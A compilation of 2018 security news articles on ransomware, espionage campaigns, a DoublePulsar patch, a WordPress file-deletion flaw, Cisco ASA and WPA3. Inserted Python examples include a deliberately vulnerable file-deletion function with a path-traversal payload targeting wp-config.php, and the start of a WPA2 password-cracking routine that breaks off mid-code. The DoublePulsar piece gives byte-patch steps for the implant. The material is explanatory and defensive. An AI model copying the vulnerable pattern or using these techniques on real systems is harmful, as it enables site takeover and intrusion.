The investigation into the various Thanatos ransomware iterations also revealed that, at least in one particular case, the attacker “had no intention of providing any sort of data decryption to the victim,” the security researchers say. The malware was being distributed as attachments to chat messages sent via Discord.

The ransom note delivered to victims as part of that attack would inform them that decryption was not available, which clearly suggested the actor was not financially motivated, but rather interested in destroying data on the victim's system.

Once executed on the victim system, the malware copies itself into a subdirectory within %APPDATA%/Roaming. It also scans the following directories to identify files to encrypt: Desktop, Documents, Downloads, Favourites, Music, OneDrive, Pictures, and Videos.

The ransomware can encrypt all files in the target directories, and the security researchers observed it discarding the encryption key after encrypting users’ files (which now have the .THANATOS extension). Because of that, the attackers can’t provide access to the decrypted data, even if a ransom demand is paid.

The encryption keys used to encrypt files on victims' systems are derived from the number of milliseconds since the system last booted. Because these keys are 32 bits and can store up to 49.7 days' worth of milliseconds, which is much higher than the average amount of uptime on many systems, “this makes brute-forcing the key values significantly cheaper from a time perspective,” Talos says.

Furthermore, because the system uptime is written to the Windows Event Log roughly once per day, “the key search space can be further reduced to approximately the number of milliseconds within the 24-hour period leading up to the infection,” the researchers note. Thus, successfully recovering the encryption key would take roughly 14 minutes.

Talos’ newly released decryption utility works with versions 1 and 1.1 of the Thanatos ransomware and on all currently known Thanatos samples the security firm has observed. Victims are advised to execute the decryptor “on the original machine that was infected and against the original encrypted files that the malware created.”

At the moment, the utility can only decrypt .gif, .tif, .tiff, .jpg, .jpeg, .png, .mpg, .mpeg, .mp4, .avi, .wav, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pdf, .odt, .ods, .odp, .rtf, .zip, .7z, .vmdk, .psd, and .lnk file types. To decrypt files, users need to download ThanatosDecryptor and execute the .exe file in the release directory.


Cyber-Espionage Campaigns Target Tibetan Community in India
28.6.2018 securityweek CyberSpy

Two cyberespionage campaigns targeting the Tibetan community based in India appear to be the work of Chinese threat actors, a new Recorded Future report reveals.

Referred to as RedAlpha, the campaigns have been ongoing for the past two years, focused on cyber-espionage. As part of these attacks, which share light reconnaissance and selective targeting, various malicious tools were used, including new malware families.

The newly uncovered campaigns took place in 2017 (involving a custom dropper and the NetHelp infostealer implant) and 2018 (when a custom validator and the njRAT commodity malware were used). The latter campaign is still ongoing.

While the second campaign leveraged a scaled-down infrastructure, likely to reduce the impact of discovery, both attacks used payloads configured with several command and control (C&C) servers, but the malware employed the doc.internetdocss[.]com C&C domain in both cases.

The security researchers also observed the attackers using a malicious Microsoft Word document that exploited CVE-2017-0199 and managed to connect the attacks to previous activity due to the use of FF-RAT and common infrastructure used by NetTraveler, Icefog, and DeputyDog APTs, as well as the MILE TEA campaign.

Over the years, the Tibetan and Uyghur communities have been targeted by many threat actors, including Chinese attackers such as the original Winnti group, LuckyCat, and NetTraveler, but also MiniDuke.

As part of the RedAlpha campaigns, the actor used a “careful combination of victim reconnaissance and fingerprinting, followed by selective targeting with multi-stage malware,” Recorded Future reports.

The first campaign started in June 2017 using two stages of largely custom malware for both 32- and 64-bit Windows systems: a straightforward dropper that would fetch a payload and establish persistence, and the NetHelp infostealer to collect system information, compress files and directories, and exfiltrate them. The attackers relied on a dual C&C infrastructure.

The email address used to register a C&C site was used to register a domain that resolves to a Hong Kong IP that was previously associated with a phishing campaign against Tibetans in 2016 and 2017. Thus, the researchers believe the same actor has been behind all three attacks.

A report on the phishing campaign suggested that a “low-level contractor” exhibiting “sloppy” tradecraft and utilizing inexpensive infrastructure was behind it. Thus, the 2017 campaign suggests “an increased level of sophistication for the attacker,” Recorded Future says.

The 2018 campaign started in January and continued until at least late April, showing a departure from the custom first-stage dropper and the adoption of a validator-style implant instead (which also checked PCs for security software). Based on the information gathered on the victim systems, the attackers would then selectively deploy njRAT onto specific machines.

This shift is part of a trend observed in the APT research community: both criminal and nation-state sponsored groups are increasingly relying on commodity malware and penetration testing tools, which not only allows them to blend in, but also means lower cost of retooling upon discovery.

Analyzing IPs and domains associated with these campaigns, the security researchers also discovered that Tibetans weren’t the only targets and say that the same group might have hit multiple targets since 2015.

The campaigns also appear connected to the FF-RAT malware that has been around since at least 2012, and which has been associated with Chinese APT activity exclusively. In 2015, the FBI said the malware was used to target the U.S. Office of Personnel Management (OPM).

“We assess FF-RAT was likely used by the same threat actors behind RedAlpha, possibly as early as 2016,” Recorded Future says.

“We do not currently possess enough evidence to categorically prove that the RedAlpha campaigns were conducted by a new threat actor. We have outlined some tentative connections, through infrastructure registrations to existing Chinese APTs, but a firm attribution requires further detail on the individuals and organizations behind the malicious activity,” the security firm concludes.


NSA-Linked Implant Patched to Work on Windows Embedded
28.6.2018 securityweek BigBrothers

DoublePulsar, one of the hacking tools the Shadow Brokers supposedly stole from the National Security Agency (NSA)-linked Equation Group, can now run on Windows Embedded devices.

The backdoor was released publicly in April last year along with a variety of Windows exploits that Microsoft had patched the month before. It is a sophisticated, multi-architecture SMB (Server Message Block) backdoor that can stay well hidden on infected machines.

In addition to SMB, it is also used as the primary payload in RDP (Remote Desktop Protocol) exploits in the NSA’s FuzzBunch software (an exploitation framework that resembles Rapid7’s Metasploit).

As it turns out, although it would work on a wide range of Windows releases, DoublePulsar wouldn’t work on devices running a Windows Embedded operating system, even if the platform itself is vulnerable to the NSA-linked exploits, a security researcher who uses the online handle Capt. Meelo says.

Windows Embedded, the researcher discovered, was indeed vulnerable to the exploits, but the relevant Metasploit modules wouldn’t work on it. Using FuzzBunch, however, he verified that the target device was indeed vulnerable via the EternalBlue exploit.

While exploitation via the EternalBlue module and the result were successful, the installation of DoublePulsar failed, so the researcher decided to analyze the implant to discover why.

What he found was that one simple line of code was enough to make it work on Windows Embedded.

DoublePulsar was designed to check the Windows version on the target machine and take one installation path on Windows 7 or another (and perform other OS checks) on other platform iterations. However, there was no check for Windows Embedded, which generated an error message.

By simply modifying an instruction in the “Windows 7 OS Check,” the researcher was able to force the implant into taking that specific installation path.

“To do this, I went to Edit > Patch program > Change byte. Then I changed the value 74 (opcode of JZ) to 75 (opcode of JNZ). I then created a DIF file by going to File > Produce file > Create DIF file,” Capt. Meelo explains.

Using a script from a security enthusiast who calls himself StalkR, he then patched the modified .exe file and moved the modified Doublepulsar-1.3.1.exe back to its original location. This resulted in a successful injection of the generated DLL payload into the target host.


Talos releases ThanatosDecryptor, a free Thanatos Ransomware decryptor
28.6.2018 securityaffairs Ransomware

Experts from Cisco’s Talos team released a free decryption tool for the Thanatos ransomware to recover the files without paying the ransom.
The Thanatos ransomware first appeared in the threat landscape in February when it was discovered by researchers at the MalwareHunterTeam.

The experts from Talos believe the malware is being actively developed; it was being distributed as attachments to chat messages sent via Discord.

When the malware encrypts files it appends the .THANATOS extension to them. Once the encryption is completed, the malware connects to a specific URL to report the infection.

The Thanatos ransomware is the first ransomware to accept Bitcoin Cash payments, along with Bitcoin and Ethereum.

At the time of its discovery, experts from Talos found a series of issues with the encryption process that make it impossible for the attackers to successfully return the data to the victim.

The experts observed several variants of the malware. The first ones used the same Bitcoin address for all victims, and payment processing was manual: victims were instructed to send an email to the crooks.


The next version implemented the support for more crypto-currencies for the payment processing and included a unique MachineID in the ransom note to distinguish each infection. Victims were instructed to send the MachineID to the attacker via email.

The experts also found at least one sample that informed victims that decryption was not available, likely because the malware was part of a sabotage operation.

Once executed on the victim’s machine, the malicious code copies itself into a subdirectory within %APPDATA%/Roaming, then it scans the system for files to encrypt searching them in the Desktop, Documents, Downloads, Favourites, Music, OneDrive, Pictures, and Videos folders.

The encryption key is derived from the number of milliseconds since the system last booted. Because that uptime counter is a 32-bit value, the effective key is only 32 bits as well, and 2^32 milliseconds corresponds to roughly 49.7 days.

Since 49.7 days is far longer than the typical uptime of most systems, the realistic key space is much smaller than 2^32, which makes a brute-force attack practical.

“This value is a 32-bit number, meaning that the encryption key is effectively 32 bits as well. Additionally, the maximum number of milliseconds that can be stored in a 32-bit value is roughly 49.7 days’ worth, which is higher than the average amount of uptime on many systems due to patch installation, system reboots, and other factors.” states the analysis published by Cisco Talos. “This makes brute-forcing the key values significantly cheaper from a time perspective.”

“Another optimization can be made based on the fact that the system uptime is written to the Windows Event Log roughly once per day. Since Thanatos does not modify the file creation dates on encrypted files, the key search space can be further reduced to approximately the number of milliseconds within the 24-hour period leading up to the infection. At an average of 100,000 brute-force attempts per second (which was the baseline in a virtual machine used for testing), it would take roughly 14 minutes to successfully recover the encryption key in these conditions.”

In short, under those conditions recovering the encryption key takes roughly 14 minutes.
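The following Python script is an added illustration of the key-recovery reasoning above; it is not Talos' ThanatosDecryptor and contains no code from the ransomware. It models only the property the analysis describes, a file key fully determined by a 32-bit uptime-in-milliseconds value, using a stand-in keystream (SHA-256 over seed and block counter) in place of the real cipher, and it assumes the attacker has known plaintext in the file header (here the PNG magic bytes). The boot time, file timestamp and sample file are constructed for the demo; the bounding of the search window from the Event Log boot time and the untouched file creation timestamp follows the optimization Talos describes.

```python
import hashlib
import struct

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"  # known plaintext: every PNG file starts with these 8 bytes


def keystream(seed: int, length: int) -> bytes:
    """Toy keystream: SHA-256 over (32-bit seed, block counter), truncated to length.
    This is a stand-in, not the Thanatos cipher; it keeps only the property the
    analysis describes: the key is entirely determined by a 32-bit uptime value."""
    out = bytearray()
    block = 0
    while len(out) < length:
        out += hashlib.sha256(struct.pack("<II", seed & 0xFFFFFFFF, block)).digest()
        block += 1
    return bytes(out[:length])


def xor_crypt(seed: int, data: bytes) -> bytes:
    """Encrypt or decrypt (XOR is its own inverse) under the seed-derived keystream."""
    return bytes(a ^ b for a, b in zip(data, keystream(seed, len(data))))


def search_window(boot_time: float, file_ctime: float, slack_ms: int) -> tuple:
    """Bound the seed from forensic artefacts: the Event Log gives the boot time and
    the encrypted file's creation timestamp (which the malware leaves untouched)
    gives when encryption ran, so uptime_ms ~= (ctime - boot) * 1000.
    Returns a half-open [lo, hi) range clipped to the 32-bit space."""
    estimate = int((file_ctime - boot_time) * 1000)
    lo = max(0, estimate - slack_ms)
    hi = min(1 << 32, estimate + slack_ms)
    return lo, hi


def recover_seed(ciphertext: bytes, known_prefix: bytes, lo: int, hi: int):
    """Brute force the seed over [lo, hi) with a known-plaintext test on the file
    header. Only the first keystream block is computed per candidate, and an
    8-byte match makes a false positive vanishingly unlikely."""
    n = len(known_prefix)
    target = ciphertext[:n]
    for seed in range(lo, hi):
        if xor_crypt(seed, known_prefix) == target:
            return seed
    return None


# --- constructed demo values (not from a real infection) ---
BOOT_TIME = 1_529_000_000.0                 # boot time in epoch seconds, per Event Log
TRUE_SEED = 37_000_123                      # ms since boot when the file was encrypted (~10.3 h)
SAMPLE_FILE = PNG_MAGIC + b"constructed image body " * 4
ENCRYPTED = xor_crypt(TRUE_SEED, SAMPLE_FILE)
FILE_CTIME = BOOT_TIME + TRUE_SEED / 1000 + 4.2   # file timestamp a few seconds after the tick value


def demo(slack_ms: int = 30_000) -> int:
    """Recover the seed from the artefacts alone and prove it by decrypting."""
    lo, hi = search_window(BOOT_TIME, FILE_CTIME, slack_ms)
    seed = recover_seed(ENCRYPTED, PNG_MAGIC, lo, hi)
    if seed is None or xor_crypt(seed, ENCRYPTED) != SAMPLE_FILE:
        raise RuntimeError("seed not found in window; widen slack_ms")
    return seed


if __name__ == "__main__":
    lo, hi = search_window(BOOT_TIME, FILE_CTIME, 30_000)
    print(f"full 32-bit space: {1 << 32:,} seeds; window to search: {hi - lo:,} seeds")
    print("recovered seed:", demo())
```

Even without the creation-timestamp bound, a plain sweep upward from zero over the 24-hour window Talos describes is about 86.4 million candidates, which is what makes the attack a matter of minutes rather than days; the timestamp only narrows it further. The same known-plaintext trick is why a decryptor should run against the original encrypted files on the original machine.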

The tool released by Talos works with versions 1 and 1.1 of the Thanatos ransomware, which covers all current samples analyzed by the experts.

“Note: In order to decrypt files as quickly as possible, ThanatosDecryptor should be executed on the original machine that was infected and against the original encrypted files that the malware created.” concludes Talos.

The ThanatosDecryptor can be downloaded here.


FastBooking Hotel booking software firm suffered a data breach
28.6.2018 securityaffairs Incident

A security breach suffered by the hotel booking software provider FastBooking has affected hundreds of hotels worldwide.
FastBooking is the latest victim of a data breach; the incident exposed personal details and payment card data of guests at affected hotels.

FastBooking offers a hotel booking platform to more than 4,000 hotels in 100 countries.

According to the experts, the number of impacted hotels worldwide could exceed 1,000, roughly 380 of them in Japan. The company did not provide details about the number of affected users.

The company promptly notified each affected hotel of the incident via email, providing details about the number of affected guests.

“Following the discovery of a suspicious application, the server log files were analyzed (computer activity traces) and we found out that some files containing data had leaked.” reads a notice published by the company.

“Fastbooking immediately eradicated the vulnerability and took steps to prevent this incident from recurring and to mitigate any negative consequences: implementing higher security standards, changing passwords on our systems, and so on.”

The attackers exploited a vulnerability in the web application to break into the FastBooking system.

The breach was discovered by company staff who noticed the presence of malware on the server: a backdoor that allowed the attacker to control the server and steal the sensitive data.

FastBooking

According to the notification emails, hackers compromised the server on June 14 and installed malware that was used to exfiltrate the data.

The hotel chain Prince Hotels & Resorts in Japan has already notified its customers of the breach, announcing that the incident affected 124,963 guests who stayed at 82 of its hotels.

“This notice is to make you aware that Prince Hotels & Resorts reservations system in English, Simplified Chinese, Traditional Chinese, and Korean have been impacted by an unauthorized access to or acquisition of your personal information.” reads the data breach notification.

“We have learned that Fastbooking in France which is a parent company of Fastbooking Japan, our reservations system operator for international guests, had an unauthorized access.”

Below the incident timeline:
June 14, 2018, 8:43 PM UTC – hackers breached FastBooking’s server.
June 19, 2018, 3:40 PM UTC – The company discovers the intrusion.
June 19, 2018, 9:02 PM UTC – The company closes the breach.

Experts believe this data breach could trigger a series of data breach notifications from all the affected hotels.


Unpatched WordPress file deletion vulnerability could allow site takeover and code execution
28.6.2018 securityaffairs
Vulnerability

Seven months ago, security experts discovered a critical file deletion vulnerability that affects all WordPress versions, and the issue is still unpatched.
The vulnerability could be exploited to take over websites running the popular CMS and gain arbitrary code execution. The potential impact is severe: WordPress is the most popular CMS and, according to W3Techs, it is used by approximately 30% of all websites.

A prerequisite for exploitation is an account with privileges to edit and delete media files; because it requires a user account, the vulnerability cannot be exploited in mass, unauthenticated attacks.

“The vulnerability was reported 7 months ago to the WordPress security team but still remains unpatched.” reads a blog post published by RIPS Technologies.

“Thus, the vulnerability can be used to escalate privileges attained through the takeover of an account with a role as low as Author, or through the exploitation of another vulnerability/misconfiguration,”

An attacker could exploit the file deletion vulnerability to delete any file of the WordPress installation, as well as any other file on the server that the PHP process user has permission to delete.

An arbitrary file deletion flaw occurs when it is possible to pass unsanitized input to a file deletion function.

In PHP, an arbitrary file deletion occurs when unlink() is called with a $filename argument (the path of the file to delete) that user input can influence, in whole or in part, without proper sanitization.

The flaw resides in the WordPress Core, the code to trigger it was found in the wp-includes/post.php file:

file deletion vulnerability WordPress

In the wp_delete_attachment() function the content of $meta['thumb'] is passed to unlink() without undergoing any sanitization.

The purpose of this snippet of code is to delete an image's thumbnail when the image itself is deleted.

Exploiting the flaw allows an attacker to delete the entire WordPress installation and to bypass security measures in order to execute arbitrary code on the server.

The experts highlighted that the attacker can delete the following files:

.htaccess, which in some setups contains security-related constraints (e.g. access restrictions on certain folders).
index.php files, which prevent an attacker from listing the contents of WordPress folders.
wp-config.php, which contains the database credentials.
RIPS Technologies reported the vulnerability to WordPress in November 2017 through the bug bounty program on HackerOne; although the WordPress team estimated that a patch would be available within six months, no fix has been released to date.

The experts published a video PoC of the attack showing how deleting wp-config.php triggers the WordPress installation process on the next visit to the website: without that file WordPress behaves as if it had never been installed, and the attacker can abuse this state to execute arbitrary code.

“Deleting this file of a WordPress installation would trigger the WordPress installation process on the next visit to the website. This is due to the fact that wp-config.php contains the database credentials, and without its presence, WordPress acts as if it hasn’t been installed yet.” continue the analysis. “An attacker could delete this file, undergo the installation process with credentials of his choice for the administrator account and, finally, execute arbitrary code on the server.”

The researchers provided a hotfix that admins can integrate into existing WordPress installations by adding it to the functions.php file of the active theme.

The fix checks that the value supplied for the thumb meta key contains nothing that would make path traversal possible, so an attacker can no longer point the unlink() call at arbitrary files.
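As an added example (not RIPS' hotfix and not WordPress code), the Python below mirrors the flawed pattern in simplified form and contrasts it with a hardened version: a basename-only check of the kind the article attributes to the hotfix, plus a realpath containment check as defence in depth. The directory layout is a constructed temporary tree and the function names are the example's own; the payload is the same relative path an Author could store as the thumb value to reach wp-config.php from wp-content/uploads.

```python
import os
import tempfile


def delete_thumbnail_vulnerable(upload_dir: str, thumb: str) -> str:
    """Mirror of the flawed pattern: a value an Author controls (the 'thumb' meta)
    is joined to the uploads directory and unlinked with no sanitization, so
    '../' sequences walk out of the uploads tree."""
    path = os.path.join(upload_dir, thumb)
    os.unlink(path)
    return path


def is_safe_thumb(thumb: str) -> bool:
    """Basename-only check of the kind the article attributes to the hotfix:
    the stored value must be a bare filename (no directory separators,
    no '.' or '..', no NUL bytes)."""
    if not thumb or "\x00" in thumb or thumb in (".", ".."):
        return False
    return os.path.basename(thumb) == thumb


def delete_thumbnail_hardened(upload_dir: str, thumb: str) -> str:
    """Reject traversal in the name, then re-check that the resolved path stays
    under the uploads directory (defence in depth against symlinks and odd separators)."""
    if not is_safe_thumb(thumb):
        raise ValueError(f"thumbnail name rejected: {thumb!r}")
    base = os.path.realpath(upload_dir)
    target = os.path.realpath(os.path.join(base, thumb))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("resolved path escapes the uploads directory")
    os.unlink(target)
    return target


def demo() -> dict:
    """Build a constructed WordPress-like tree and exercise both versions."""
    root = tempfile.mkdtemp(prefix="wp-demo-")
    uploads = os.path.join(root, "wp-content", "uploads")
    os.makedirs(uploads)
    config = os.path.join(root, "wp-config.php")
    thumb = os.path.join(uploads, "photo-150x150.jpg")
    for f in (config, thumb):
        open(f, "w").close()

    payload = "../../wp-config.php"   # relative to wp-content/uploads
    results = {}

    try:
        delete_thumbnail_hardened(uploads, payload)
        results["hardened_blocked"] = False
    except ValueError:
        results["hardened_blocked"] = True
    results["config_survives_hardened"] = os.path.exists(config)

    delete_thumbnail_hardened(uploads, "photo-150x150.jpg")   # legitimate thumbnail still works
    results["legit_thumb_deleted"] = not os.path.exists(thumb)

    delete_thumbnail_vulnerable(uploads, payload)              # the original pattern removes wp-config.php
    results["config_deleted_by_vulnerable"] = not os.path.exists(config)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The name check alone closes the traversal described in the article; the containment check catches what a name check cannot see, such as a symlink planted inside the uploads directory that points elsewhere.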

“The provided fix shall ultimately be seen as a temporary fix in order to prevent attacks. We cannot oversee all possible backwards compatibility problems with WordPress plugins and advise to make any modifications to your WordPress files with caution,” RIPS Technologies concludes.


House Passes Bill to Enhance Industrial Cybersecurity
27.6.2018 securityweek Cyber

The U.S. House of Representatives on Monday passed a bill aimed at protecting industrial control systems (ICS), particularly ones used in critical infrastructure, against cyberattacks.

The legislation, H.R. 5733, formally known as the “DHS Industrial Control Systems Capabilities Enhancement Act,” was introduced on May 9 by Rep. Don Bacon (R-NE) and it was approved by the House Committee on Homeland Security on June 6. The bill was announced a few weeks after the United States officially accused Russia of attempting to take control of critical infrastructure systems.

The new bill amends the Homeland Security Act of 2002 and requires the DHS’s National Cybersecurity and Communications Integration Center (NCCIC) to identify and mitigate threats and risks to ICS technologies and products used in critical infrastructure organizations.

House passes legislation aimed at strengthening industrial cybersecurity

The bill also requires NCCIC to maintain cross-sector incident response capabilities for ICS-related events, and provide technical assistance to end-users, product manufacturers, and other stakeholders in identifying and mitigating vulnerabilities in industrial control systems.

The agency is also required to provide the ICS community with information on vulnerabilities, based on collaboration with security researchers, manufacturers and industry end-users. The DHS will have to brief Congress every six months over the next four years.

The Congressional Budget Office (CBO) estimates that enacting this piece of legislation would cost less than $500,000 over the 2019-2023 period due to the fact that NCCIC already provides assistance to critical infrastructure operators and control system vendors, and the bill would only codify the agency’s responsibilities without imposing any new operating requirements.

“The next ‘Pearl Harbor attack’ will not be with missiles and torpedoes alone, but will be paired with attacks to our private sector functions needed to support our daily lives, such as our electric grid,” said Rep. Bacon. “DHS provides critical support to operators of industrial control systems (ICS), and my bill clarifies this responsibility so the Department can continue to identify and address threats to ICS in critical infrastructure. Any disruption or damage to critical infrastructure has the potential to cause catastrophic consequences to our nation’s public health and safety, economic security, and national security.”


Toxic Content, Insider Threats Lurk in Business Collaboration Tools: Report
27.6.2018 securityweek Analysis

A new report quantifies what every manager instinctively knows: private messaging within collaboration tools can hide worrying content sent between employees. This can include confidential and sensitive data inappropriately shared, password sharing, and even toxic sentiment that could harm workplace productivity or highlight a nascent insider threat.

Wiretap, a firm that provides monitoring for collaboration tools such as Slack, Microsoft Teams, Yammer, Workplace by Facebook and Skype for Business, has analyzed (PDF) more than a million enterprise collaboration messages from tens of thousands of authors. The premise of the study is that without knowledge of the risks hidden in collaboration tools, organizations could become victims of their own staff, or possibly worse, eschew the undoubted benefits of collaboration tools altogether.

The Wiretap findings are categorized in three areas: sentiment, toxicity and insider threats.

Sentiment covers employees' moods and feelings towards the company and its leadership. "With an understanding of employee opinion, leaders can better determine where to invest in company culture, development, and workplace conditions," notes the report. Understanding how sentiment is shared in private conversations on company collaboration tools can help a firm reduce staff churn, and maintain a positive company culture.

Toxicity covers behavior including sexual harassment, racism and bullying. "Toxic employees have a way of spreading their behavior to others around them, similar to a nasty virus; crippling others' morale, performance, and productivity," warns the report; adding, "Unfortunately, companies like Uber, Fox News, or Nike know all too well the repercussions of turning a blind eye to toxic behavior."

In 2017, Uber fired more than 20 employees for sexual harassment. Had the company been aware of this toxic subculture within the firm, senior management could perhaps have prevented its growth. Wiretap believes that such issues could be first discovered by monitoring collaboration tools, and then remedied before they have a chance to root.

Insider threats come from naive users, malicious users, and even whistleblowers (whose motives may be subject to interpretation). They "are one of the most prevalent threats in an enterprise environment," says the report, "and are difficult to mitigate." It points out that an article in Harvard Business Review, "estimates that 80 million insider attacks occur annually, a cost that amounts to more than $10 billion in fines, penalties, or operational disruption."

Wiretap's analysis shows that in each of these three areas, questionable content is far more likely to appear in the private areas of collaboration tools than in public channels or in more traditional media such as email. For example, 1 in 190 private messages is negative in sentiment, while only 1 in 280 public messages is.

Messages in private groups are 135% more likely to be toxic in content than messages in a public environment. This rises to 250% more likely in a private one-to-one conversation.

Private messages -- especially those displaying negative sentiment -- may also indicate potential insider threat issues. Employees rarely join a company with an intent to be a threat -- this grows over time as a response to real or perceived slights. Indeed, the cause may be entirely external to the company, caused by increasing domestic or financial pressures. Nevertheless, an indication of these stresses would likely show in internal private messages -- and if detected early enough, management can step in to defuse the situation, offer assistance, and keep an otherwise valuable employee.

"The truth is," warns the report, "people act one way in formal meetings and another way on their company's digital collaboration network. And this inconvenient truth can add a layer of risk, or a blind spot, for the organization."

“Our report sheds light on what we know," comments Jason Morgan, Wiretap’s vice president of behavioral intelligence; "that human behavior is unpredictable – and despite the small population of risky users engaging in this behavior, organizations must be able to identify toxic actors before they ruin company culture. Ultimately, organizations need to track sentiment and tone of both public and private conversations to get a true pulse on the health of their community, and to assess any areas of potential risk.”

Most companies already monitor their users' use of corporate email -- indeed this is almost a necessity to comply with the personal data protection requirements of regulations such as the EU's General Data Protection Regulation (GDPR). Wiretap's Behavior Risk Analysis Report demonstrates that risky user communications are even more likely to occur in the relative privacy of collaboration tools than in traditional communication systems such as email.

The company's Aware by Wiretap product uses AI-infused monitoring to detect problems showing in private messages that would otherwise be missed by management. This allows for proactive recognition and mitigation before an issue can develop into a crisis.

In July 2017, Columbus, Ohio-based Wiretap closed a $4.9 million Series A financing round led by Pittsburgh-based Draper Triangle Ventures, Columbus-based Ohio Innovation Fund and Rev1 Ventures, as well as JumpStart Inc., bringing the total raised to $7.9 million.


Cisco ASA Flaw Exploited in DoS Attacks
27.6.2018 securityweek
Vulnerability

Cisco has informed users that a recently patched vulnerability affecting its Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software has been exploited in denial-of-service (DoS) attacks.

The vulnerability, tracked as CVE-2018-0296 and classified “high severity,” was addressed with the patches released by Cisco in early June.

The flaw was reported to the networking giant by researcher Michal Bentkowski, who discovered that a remote and unauthenticated attacker could gain access to sensitive system information through directory traversal techniques. Cisco’s own analysis of the bug revealed that it can also be exploited to cause impacted devices to reload and enter a DoS condition.

According to Cisco, the vulnerability exists due to the lack of proper input validation of the HTTP URL. An attacker can exploit the security hole by sending specially crafted HTTP requests to the targeted device.

The list of impacted devices includes 3000 series Industrial Security Appliances, ASA firewalls, and Firepower products.

Cisco updated its advisory last week to warn users that the vulnerability has been exploited to cause a DoS condition. The company noted that it has not seen any attacks attempting to leverage the flaw to obtain sensitive information.

“Cisco PSIRT has become aware of a public proof-of-concept exploit and is aware of customer device reloads related to this vulnerability. Cisco strongly recommends that customers upgrade to a fixed Cisco ASA software release to remediate this issue,” Cisco wrote in its advisory.

Bentkowski has made public the technical details of the flaw (blog post written in Polish) and at least two other researchers have published PoC exploits that can be used to obtain sensitive information, including usernames.

HackerOne’s Yassine Aboukir, who published a PoC on GitHub on June 21, noted that it’s easy to find vulnerable devices on the Internet using Shodan, Censys and even Google.

GreyNoise Intelligence has also been tracking exploitation of the vulnerability.

Cisco ASA vulnerability exploited in the wild


Recently discovered RANCOR cyber espionage group behind attacks in South East Asia
27.6.2018 securityaffairs CyberSpy

Security researchers at Palo Alto Networks have uncovered a new cyber espionage group tracked as RANCOR that has been targeting entities in South East Asia.
According to the experts, the RANCOR APT group has been targeting political entities in Singapore, Cambodia, and Thailand, and likely in other countries, using two previously unknown strains of malware, tracked as DDKONG and PLAINTEE.

The hackers leverage spear phishing messages using weaponized documents containing details taken from public news articles on political news and events. These decoy documents are hosted on legitimate websites, such as the website of the Cambodia Government, and Facebook.

“Throughout 2017 and 2018 Unit 42 has been tracking and observing a series of highly targeted attacks focused in South East Asia, building on our research into the KHRAT Trojan. ” reads the analysis published by PaloAlto Networks.

“Based on the evidence, these attacks appear to be conducted by the same set of attackers using previously unknown malware families. In addition, these attacks appear to be highly targeted in their distribution of the malware used, as well as the targets chosen. Based on these factors, Unit 42 believes the attackers behind these attacks are conducting their campaigns for espionage purposes.”

The recent campaign appears related to the KHRAT Trojan, a backdoor associated with the China-linked APT group tracked as DragonOK, which has also been linked to malware families such as NetTraveler (TravNet), PlugX, Saker, Netbot, DarkStRat and ZeroT.

The KHRAT RAT provides attackers with the typical set of RAT features, including remote access to the victim system, keylogging, and remote shell access.

One of the IP addresses that domains associated with the KHRAT backdoor resolved to led the researchers to websites mimicking popular technology companies (e.g. facebook-apps[.]com). The experts linked the PLAINTEE malware and a loader to that domain; in total they were able to analyze only six samples, associated with two separate infrastructure clusters.

RANCOR

PaloAlto researchers discovered that both clusters were involved in the campaigns that targeted organizations in South East Asia.

In at least one attack against a company, the attackers used a Microsoft Office Excel document with an embedded macro to execute the malware; the main malicious code was hidden in an EXIF metadata property of the document. The same technique was used last year by the Russia-linked APT group Sofacy.

Researchers uncovered another attack leveraging an HTML Application file (.hta), and a series of attacks that used DLL loaders.

“We identified three unique DLL loaders during this analysis. The loaders are extremely simple with a single exported function and are responsible for executing a single command.” continues the analysis.

DDKONG was first detected in February 2017 and has been used by other attackers in the wild, whereas PLAINTEE has been used exclusively by the RANCOR group.

An interesting feature of the PLAINTEE malware is its use of a custom UDP protocol for network communications.

“The RANCOR campaign represents a continued trend of targeted attacks against entities within the South East Asia region. In a number of instances, politically motivated lures were used to entice victims into opening and subsequently loading previously undocumented malware families.” Palo Alto concludes. “These families made use of custom network communication to load and execute various plugins hosted by the attackers,”


The Wi-Fi Alliance announced the launch of the WPA3 security standard
27.6.2018 securityaffairs Safety

The Wi-Fi Alliance announced late on Monday the launch of the WPA3 security standard, which promises to improve Wi-Fi security.
The Wi-Fi Alliance has officially launched WPA3, the new Wi-Fi security standard that is meant to address the known security issues of the previous standards and to mitigate wireless attacks such as KRACK and deauthentication attacks.

The Wi-Fi Alliance includes tech giants like Apple, Cisco, Intel, Qualcomm, and Microsoft.

WPA (Wi-Fi Protected Access) is the family of wireless security standards that authenticates devices joining a network and encrypts their traffic (with AES since WPA2) so that connections cannot be eavesdropped.

The new security standard replaces the WPA2 that is currently used by billions of devices every day.

WPA3 brings important improvements for Wi-Fi enabled devices, addressing configuration, authentication and encryption weaknesses.

“WPA3 takes the lead in providing the industry’s strongest protections in the ever-changing security landscape,” said Edgar Figueroa, president and CEO of the Wi-Fi Alliance. “WPA3 continues the evolution of Wi-Fi security and maintains the brand promise of Wi-Fi Protected Access.”

WPA3 operates in Personal and Enterprise modes, covering home, enterprise and IoT wireless networks.

The Personal mode implements enhanced protection against offline dictionary attacks and password guessing, offering a higher level of security even when users choose weak passwords. It replaces the pre-shared-key handshake with SAE (Simultaneous Authentication of Equals), a password-authenticated key exchange in which each password guess requires a live exchange with the access point, and it introduces forward secrecy so that previously captured traffic cannot be decrypted even if the password is later compromised.
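To make concrete what SAE removes, here is an added example (not Wi-Fi Alliance code and not from the article) of the offline dictionary attack that WPA2-Personal permits: given a passively captured 4-way handshake, an attacker can test every password guess locally, because PMK = PBKDF2(passphrase, SSID), the PTK follows from the PMK and the captured MAC addresses and nonces, and the EAPOL MIC is an HMAC keyed with the first 16 bytes of the PTK. The handshake values below are constructed, not captured from a real network; only the Python standard library is used.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID, the only salt, is broadcast in the clear."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated."""
    out = b"".join(
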